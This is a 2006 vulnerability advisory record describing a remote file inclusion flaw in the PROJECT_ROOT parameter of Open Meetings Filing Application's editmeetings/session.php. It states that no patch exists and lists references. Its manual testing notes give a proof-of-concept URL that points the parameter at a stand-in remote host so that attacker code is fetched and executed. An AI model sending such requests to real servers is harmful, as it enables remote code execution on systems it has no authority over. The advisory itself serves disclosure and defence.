Open Meetings Filing Application editmeetings/session.php PROJECT_ROOT Variable Remote File Inclusion

2006-10-21T11:03:49
ID OSVDB:29975
Type osvdb
Reporter xoron(x0r0n@hotmail.com)
Modified 2006-10-21T11:03:49

Description

Vulnerability Description

Open Meetings Filing Application contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to editmeetings/session.php not properly sanitizing user input supplied to the 'PROJECT_ROOT' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Open Meetings Filing Application contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to editmeetings/session.php not properly sanitizing user input supplied to the 'PROJECT_ROOT' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[script_path]/editmeetings/session.php?PROJECT_ROOT=http://evil_script?

References:

Vendor URL: http://www.gocc.gov/groups/RI_SOS/software/open_meetings_filing_app Secunia Advisory ID:22503 Related OSVDB ID: 29976 Related OSVDB ID: 29977 Related OSVDB ID: 29978 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0358.html ISS X-Force ID: 29773 Generic Exploit URL: http://www.milw0rm.com/exploits/2609 FrSIRT Advisory: ADV-2006-4144 CVE-2006-5517 Bugtraq ID: 20656